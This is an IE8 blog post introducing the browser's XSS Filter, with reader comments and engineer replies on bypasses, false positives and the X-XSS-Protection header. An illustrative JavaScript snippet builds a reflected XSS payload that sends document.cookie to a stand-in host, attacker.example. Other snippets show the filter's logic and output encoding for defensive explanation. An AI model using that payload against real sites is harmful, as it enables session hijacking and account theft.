IE8 Security Part IV: The XSS Filter

Hi, I'm David Ross, Security Software Engineer on the SWI team. I’m proud to be doing this guest post on the IE blog today to show off some of the collaborative work SWI is doing with the Internet Explorer team.

Today we are releasing some details on a new IE8 feature that makes reflected / “Type-1” Cross-Site Scripting (XSS) vulnerabilities much more difficult to exploit from within Internet Explorer 8. Type-1 XSS flaws represent a growing portion of overall reported vulnerabilities and are increasingly being exploited “for fun and profit.”

The number of reported XSS flaws in popular web sites has skyrocketed recently – MITRE has reported that XSS vulnerabilities are now the most frequently reported class of vulnerability. More recently, sites such as XSSed.com have begun to collect and publish tens of thousands of Type-1 XSS vulnerabilities present in sites across the web.

XSS vulnerabilities enable an attacker to control the relationship between a user and a web site or web application that they trust. Cross-site scripting can enable attacks such as:

Cookie theft, including the theft of session cookies that can lead to account hijacking

Monitoring keystrokes entered into the victim web site / application

Performing actions on the victim web site on behalf of the victim user. For example, an XSS attack on Windows Live Mail might enable an attacker to read and forward e-mail messages, set new calendar appointments, etc.
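To make the cookie-theft case concrete, here is a deliberately simplified sketch. The handler name, parameter, and attacker domain are all invented for illustration: a server that echoes a query parameter into its HTML without encoding will replay whatever "script" arrives in the URL.

```javascript
// Illustrative only: a hypothetical vulnerable handler that echoes a
// query parameter into the page without encoding. All names and the
// attacker domain are invented for this sketch.
function renderSearchPage(query) {
  // BUG: `query` is inserted into the HTML verbatim.
  return `<html><body>Results for: ${query}</body></html>`;
}

// A reflected payload: the "script" arrives in the URL and is replayed
// back into the response, where the victim's browser executes it and
// ships document.cookie off to the attacker.
const payload =
  '"><script>new Image().src="https://attacker.example/steal?c="' +
  '+document.cookie</script>';

const page = renderSearchPage(payload);
console.log(page.includes('<script>')); // true
```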

While many great tools exist for developers to mitigate XSS in their sites / applications, these tools do not satisfy the need for average users to protect themselves from XSS attacks as they browse the web.

XSS Filter – How It Works

The XSS Filter operates as an IE8 component with visibility into all requests / responses flowing through the browser. When the filter discovers likely XSS in a cross-site request, it identifies and neuters the attack if it is replayed in the server’s response. Users are not presented with questions they are unable to answer – IE simply blocks the malicious script from executing.
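As a rough illustration of the detect-and-neuter flow described above — not IE8's actual signatures or neutering rules, which are far more sophisticated — a toy filter might look like this. The single regex and the '#' substitution are illustrative assumptions only:

```javascript
// A deliberately tiny sketch of the "detect in request, neuter in
// response" idea. IE8's real heuristics cover many more constructs;
// this regex and the '#' substitution are invented for illustration.
const SUSPECT = /<script[^>]*>/i;

function filterResponse(requestUrl, responseBody) {
  const match = decodeURIComponent(requestUrl).match(SUSPECT);
  if (!match || !responseBody.includes(match[0])) {
    // No script-like construct in the URL, or the server did not
    // replay it into the page: nothing to do.
    return { body: responseBody, blocked: false };
  }
  // Neuter only the replayed script instead of blocking the response.
  const neutered = responseBody
    .split(match[0])
    .join(match[0].replace('<', '#'));
  return { body: neutered, blocked: true };
}

const url = 'http://victim.example/page?q=%3Cscript%3Ealert(1)%3C/script%3E';
const body = '<html>Results: <script>alert(1)</script></html>';
console.log(filterResponse(url, body).blocked); // true
```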

With the new XSS Filter, IE8 Beta 2 users encountering a Type-1 XSS attack will see a notification like the following:

[Screenshot: the page has been modified and the XSS attack is blocked.]

In this case the XSS Filter has identified a cross-site scripting attack in the URL. It has neutered this attack as the identified script was replayed back into the response page. In this way the filter is effective without modifying an initial request to the server or blocking an entire response.

As you may imagine, there are a number of interesting and subtle scenarios that the filter must handle appropriately. Here are some examples:

The filter must be effective even if the attack is adjusted to leverage artifacts of common web application frameworks. Ex: Will an attack still be detected if certain characters in a request are dropped or translated when replayed in the response?

In performing filtering, our code must not introduce new attack scenarios that would not otherwise exist. Ex: Imagine the filter could be forced to neuter a closing SCRIPT tag. In that case, untrusted content on the page might then execute as script.

Compatibility is critical. This feature was developed with the understanding that if it were to “break the web,” we could not enable the feature by default. Or if we did, people would turn it off and get no benefit. We really want to provide as much value as possible to the maximum number of users.
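The second example above — careless neutering creating a brand-new injection — can be sketched as follows. The markup and the naive filter are invented for illustration:

```javascript
// Sketch of how careless neutering creates a new injection: if a
// filter blanks the legitimate closing </script> tag, everything
// after it -- including untrusted page content -- is parsed as
// script source rather than as markup.
function naiveNeuter(html) {
  return html.replace(/<\/script>/gi, '#/script>');
}

const markup =
  '<script>var q = "safe";</script>' +
  '<p>untrusted comment: };alert(document.cookie);//</p>';

// After neutering there is no close tag, so the browser keeps reading
// the "comment" as part of the script block.
const broken = naiveNeuter(markup);
console.log(broken.includes('</script>')); // false
```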

Web developers may wish to disable the filter for their content. They can do so by setting an HTTP response header: X-XSS-Protection: 0

Ultimately we have taken a very pragmatic approach – we chose not to build the filter in such a way that we compromise site compatibility. Thus, the XSS Filter defends against the most common XSS attacks, but it is not, and will never be, an XSS panacea. This is similar to the pragmatic approach taken by ASP.NET request validation, although the XSS Filter can be more aggressive than the ASP.NET feature.

Assuming negligible site compatibility and performance impact, the fact that our filter effectively blocks the common “><script>… pattern we see most frequently in Type-1 XSS attacks is inherently a step forward. Pushing that further and blocking other common cases of reflected XSS where possible, as the XSS Filter does, is extra goodness.

Caveats aside, it will be great to see the tens of thousands of publicly disclosed Type-1 XSS vulnerabilities indexed on sites like XSSed.com simply stop working in IE8. (Not to mention the IFRAME SEO Poisoning attacks we protect against as well!)

I will go into more details on how the filter works, its history, its limitations, and some lessons learned during the development process over on my blog in the coming weeks.

Please keep in mind that this information bar isn’t a “prompt” that asks the user to make a security decision; it is a “notification” that a security protection was activated. The notice is shown to help IT Admins and Web Developers troubleshoot any XSS Filter-related page modification.

It’s quite unlikely that any user will see this information bar in the course of normal browsing.

Suggesting to set a proprietary HTTP header may seem like a nice opt-out, but it may leave your site vulnerable to other real XSS exploits that you might want IE to block. Besides, if every software vendor were to suggest this kind of opt-out, we would end up sending kilobytes of HTTP headers just to suit every software vendor on the block – many of which are known to make mistakes with their ‘security features’.

My fear is that with every ‘possible attack vector’ Microsoft wants to mitigate, the number of false positives will rise. Hopefully the implementation will be somewhat smarter than, for instance, the ‘bad content’ filter used for MSN…


Why the choice to modify the page instead of blocking the request altogether? It only increases the chance of circumvention. IMHO, regarding reflected XSS, all URIs and/or query strings containing HTML should be blocked, because I am not aware of any legitimate use for them whatsoever in any application.

"Maybe I’m missing something obvious, but if web developers can disable this filtering by using "X-XSS-Protection: 0", what’s stopping the bad guys from doing the same?"

This is sent as a response header, which is MUCH more difficult for a third party to inject (your website has done something exceptionally bad if they can do so). XSS is trivial; header injection reflected back to the client, not so much.

As for the false positives, I suspect they will occur predominantly on poorly written websites that ARE vulnerable. If parameters in the URL are being echoed back into the HTML without entity encoding, the website is poorly designed and XSS does exist, even if a specific URL actually functions the way the developer intended.
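To illustrate the fix that makes such false positives moot: encode on output so reflected input is displayed as text, never executed. The encoder and page function below are a minimal sketch, not from any particular framework.

```javascript
// The durable fix for reflected XSS is output encoding, not filtering.
// Node has no built-in HTML encoder, so this sketch supplies a minimal
// one covering the five characters that matter in HTML text and
// attribute values. renderPage is invented for illustration.
function encodeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderPage(query) {
  // Encoded on output: a payload is displayed as text, never executed.
  return `<html><body>Results for: ${encodeHtml(query)}</body></html>`;
}

console.log(renderPage('"><script>alert(1)</script>').includes('<script>')); // false
```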

Ryan: Yes, JoshBw is correct. Header injection attacks are MUCH less common than script-injection attacks via XSS, by orders of magnitude at least. If a bad guy is able to inject new custom headers in your browser, XSS is the least of your worries, as chances are good that he could entirely replace the page. JoshBw is also correct to note that most false positives aren’t false positives at all, but actually evidence of potential for future exploit.

rvdh: Compatibility is key. It’s somewhat non-intuitive, but think about it: your car is fast because it has brakes (because then you can slow down when you need to). In the same way, the investment we made in compatibility lets us have very aggressive heuristics, because even in the event of a false match, chances are good that the resulting page will not be broken. Hence, we are able to catch more XSS attacks. There are many legitimate uses of URLs that contain potential scripting constructs. In the extreme example, consider a site that allows the user to share sample JavaScript with other users. If we were to block all outbound script, then such a site would be impossible to build, even though the site (if properly coded) has no XSS vulnerabilities. So, as you can see, our ability to block the attacks only (without harming non-attack sites) means that we can keep the XSS Filter enabled and aggressive.

@Darko: There’s no meaningful performance degradation for the sites you mention, as the filter only fires in the event of cross-domain navigations, and only then in very rare cases. As described previously, the feature was designed around compatibility, because minimizing false positives is key to ensuring that users are able to benefit from the protections of this feature.

@Tino: You can report false positives to us through the "Report broken website" tool or even email me directly (ericlaw at microsoft) although, as noted, most false positives are actually proof of latent exploitability. It’s possible to build a contrived site that deliberately triggers false positives, but it’s easy to avoid these without actually turning the feature off via the header.

@Eric: Thanks for the explanation, although I doubt that my web browser of choice has such a "Report broken website" feature 😉

My fear is based on actual experience with tools from anti-virus vendors that try to do the same: we have been listed as an ‘untrusted site’ because some malware-propagating site was ‘only’ three clicks removed from a link in our content; parts of our JavaScript have been blocked because they contained the phrase ‘ads’; and recently we have seen a large number of bogus requests on our site because some anti-virus vendor is prefetching links from Google search results to a certain depth, but completely disregards <base href>…

That’s why I’m sceptical of any of these efforts: it seems that as a site owner you are declared ‘guilty’ unless you can prove your own innocence, and it sometimes takes a lot of time before the verdict is rectified…

Well, I do think it’s a very good idea: if a developer uses MSIE to test his site, he immediately sees that something is broken and will probably fix it. So it can be very helpful in getting rid of XSS altogether, and serve as an educational tool for surfers as well as developers.

However, I’m still for blocking the request altogether instead of modifying it and raising a warning. I am not sure how it gets modified, but it could lead to other attacks as well, because rewriting JavaScript has never really worked well in filters. All filters I know of had at least one flaw in rewriting content that opened up new vectors.

I’m wondering how well this filter deals with obfuscation of code, which has been shown in the past to be one of the harder parts of building a decent XSS filter. It’s great that this has been implemented, but if the filter only goes one or two levels of obfuscation deep, then there’s probably more work to be done.

I can already picture this as a strong new reason/excuse for programmers not to get educated on secure programming, relying on this feature instead. Speaking from a security consultant’s standpoint, it’s already hard enough to explain to devs why a fix is necessary. IE is just one choice of browser.